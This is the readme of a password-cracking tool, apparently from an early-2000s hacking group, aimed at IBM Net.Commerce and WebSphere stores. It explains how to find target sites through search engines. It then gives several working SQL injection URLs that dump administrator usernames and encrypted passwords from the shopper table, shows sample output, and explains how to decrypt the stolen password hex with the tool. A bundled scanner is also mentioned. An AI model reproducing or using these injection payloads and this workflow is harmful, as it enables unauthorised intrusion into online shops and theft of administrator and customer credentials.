SUQ.DIQ version 1.00
by xor37h and darkman of SMERSH
Danish Design

Description:
A Win32 application, developed in assembly, for encrypting and decrypting passwords from
IBM Net.Commerce, WebSphere and possibly other IBM and Lotus applications aswell.

IBM Net.Commerce and WebSphere use TripleDES to encrypt the passwords, but instead of
encrypting a string with the password as key, IBM encrypts the password using a fixed key.
The user can change the default key while installing IBM Net.Commerce and WebSphere in
advanced mode. But since it complicate things changing the key, we don't expect this to be
a common sight. In case you do stumble upon a site, using a different key and you're able
to locate the key, cut&paste it in to the "Key" field in SUQ.DIQ and you'll be able to
decrypt those passwords aswell.

It's very easy locating sites running IBM Net.Commerce or WebSphere, just go to your
favourite search engine (whether it's www.google.com, www.altavista.com, www.yahoo.com or
any other search engine) and search for "/ncommerce3" without the quotes.

Lets imagine you found a site named www.suq.diq.net with Net.Commerce or WebSphere installed,
if you want to get a list of all the system administrator usernames, you should type the
following in the URL:

http://www.suq.diq.net/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

You'd see a HTML page looking a bit like this:
 
									  TELL ME ABOUT THIS PAGE
									  
									  
				-------------------
				  MALL STORE NAME 
				-------------------
				
			       Order Details: ncadmin 

				Order Details: xor37h

			       Order Details: darkman 

Database Error: 
A database error occurred. Please contact the merchant server administrator. SQL Error Code = -421 

If you want to get the encrypted password for a specific username, you should type the
following in the URL:

http://www.suq.diq.net/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

The above line will get you the password for the: ncadmin account, which is a system
administrator account much like root is at systems running UNIX. You'll see a HTML page
looking a bit like this:

									  TELL ME ABOUT THIS PAGE
									  
									  
				-------------------
				  MALL STORE NAME 
				-------------------
				
				  Order Details:
2F6E44796F72576B424A633D2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020 

Database Error: 
A database error occurred. Please contact the merchant server administrator. SQL Error Code = -421 

Then you fire up the SUQ.DIQ application, cut&paste the long hex number from the browser
to the "Input password" field in the SUQ.DIQ application, you don't have to copy it all
of the long hex number, only till the '20's, in this case it's "2F6E44796F72576B424A633D".
And then you press OK and SUQ.DIQ will decrypt the encrypted password and show you the
plain text password in the "output password" field, which in this case is: "SUQ.DIQ",
without the quotes.

Below is a couple of SQL calls you might find usefull aswell:

Will show a list of all the usernames:
http://www.suq.diq.net/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shlpswd+is+not+null;

Will show a list of all the usernames and passwords:
http://www.suq.diq.net/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+CHAR(shlogid)||HEX(shlpswd)+as+mestname,0+from+shopper+where+shlpswd+is+not+null;

MSVCRT.DLL is required to run this application.

To increase the enjoyment of this application we included nc3.pl, An IBM net.commerce/websphere
user/password scanner, made by antistar, thank you very much.

We'd like to thank B0z0, Painter6 and Ratter for either helping us or trying to help us.
Furthmore we'd like to thank Rudi Carell for publishing the information regarding how to
query data through the macros.

If you're interested in the source code or want to get in touch with us, please contact
us at: suqdiq@hotpop.com
